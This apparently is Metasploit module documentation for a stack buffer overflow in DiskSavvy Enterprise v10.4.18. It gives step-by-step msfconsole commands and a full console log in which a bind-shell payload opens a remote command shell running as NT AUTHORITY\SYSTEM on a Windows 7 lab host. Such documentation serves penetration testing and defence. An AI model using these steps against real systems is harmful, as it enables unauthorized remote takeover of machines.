## Vulnerable Application

[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe).

## Verification Steps
  1. Install a vulnerable DiskSavvy Enterprise
  2. Start `msfconsole`
  3. Do `use exploit/windows/misc/disk_savvy_adm`
  4. Do `set RHOST ip`
  5. Do `set PAYLOAD windows/shell/bind_tcp`
  6. Do `exploit`
  7. Enjoy your shell

## Scenarios

### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86

```
msf > use exploit/windows/misc/disk_savvy_adm 
msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55
RHOST => 192.168.216.55
msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(windows/misc/disk_savvy_adm) > exploit 

[*] Started bind handler
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.216.55
[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami      
whoami
nt authority\system

C:\Windows\system32>
```